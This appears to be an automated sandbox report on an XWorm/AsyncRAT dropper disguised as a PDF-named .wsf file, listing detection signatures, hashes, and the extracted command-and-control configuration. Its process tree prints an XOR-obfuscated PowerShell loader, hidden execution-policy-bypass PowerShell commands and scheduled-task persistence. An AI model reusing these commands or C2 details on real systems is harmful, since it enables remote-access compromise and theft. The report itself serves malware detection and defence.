Edit tour
Windows
Analysis Report
reported_account_violation-pdf-67223451.wsf
Overview
General Information
| Sample name: | reported_account_violation-pdf-67223451.wsf |
| Analysis ID: | 1517939 |
| MD5: | fb43dcd8581a7cded732e93b9b6b61a1 |
| SHA1: | f61761d095c2b193ce07529ac13ad6d622b64699 |
| SHA256: | d3036ee6b4f2717e05a9a2b62bba456dd5b4c0f353517676318a609976f0b5a5 |
| Tags: | AsyncRATRATwsfuser-abuse_ch |
| Infos: |   |
 | |
Detection
XWorm
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6432 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\repor ted_accoun t_violatio n-pdf-6722 3451.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 4908 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$ReDrO = . ( $psHom e[4]+$pShO mE[30]+'X' )(-JOIn( ' 122f12!99, 121{23I59C 6j118,16,5 9B121{101C 122,12k27f 126{99k126 !122I12C11 7O121j9O11 5O17C28,20 O121!101j1 22B12!27k2 6!126f99I1 26I122I12f 27C117B121 C59C29f10j 126k16k59k 10!112O9B1 21f101k122 I14!31C29I 99I121O59{ 28B29k18j1 21k101C122 O38!38f126 B99C126,12 2!14{31{29 f117C121j2 3f59O16{12 1!101B122k 12I17C126{ 99!126!122 !38{38k117 O121,10O11 9k112k26O1 7f9C16I18k 17f121,101 C122C36j36 ,99I121B17 j30O110,11 8j120O118C 121O121I54 !42B42C46C 45O100I113 ,113C46{63 k45I42f59I 112j59{59f 113I44I113 O47B58!43{ 13f24B113O 110f121f12 1C119f121j 112f12{59O 14C18C31O2 9k59C118!1 21{17B30j1 10B118k120 k121{114O1 21k31B26C1 3j10f12,23 !16{25B121 C119{101k5 5!59O38{11 8,122!12,2 7!26O117C1 22I12j17B1 17{122C36k 36f119'.SP Lit( ',!kj I{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; power shell $ReD rO" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 4928 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7300 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "MSFT_Sche duledTask (TaskName = "MicroSo ftVisualsU pdater", T askPath = "\")" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 1196 cmdline:
C:\Windows \System32\ WScript.ex e "C:\Prog ramData\Mu sic\Visual s\VsLabs.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4208 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Prog ramData\Mu sic\Visual s\VsEnhanc e.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7200 cmdline:
cmd /c Pow ershell -n oP -W hidd en -ep byP ass -NONI "C:\Progra mData\Musi c\Visuals\ VsLabsData .ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 7216 cmdline:
Powershell -noP -W h idden -ep byPass -NO NI "C:\Pro gramData\M usic\Visua ls\VsLabsD ata.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - RegSvcs.exe (PID: 7624 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- wscript.exe (PID: 7940 cmdline:
C:\Windows \System32\ WScript.ex e "C:\Prog ramData\Mu sic\Visual s\VsLabs.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7992 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Prog ramData\Mu sic\Visual s\VsEnhanc e.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8036 cmdline:
cmd /c Pow ershell -n oP -W hidd en -ep byP ass -NONI "C:\Progra mData\Musi c\Visuals\ VsLabsData .ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 8052 cmdline:
Powershell -noP -W h idden -ep byPass -NO NI "C:\Pro gramData\M usic\Visua ls\VsLabsD ata.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - RegSvcs.exe (PID: 7300 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["ALBANIAH3CKER.WORK.GD"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Thomas Patzke: | ||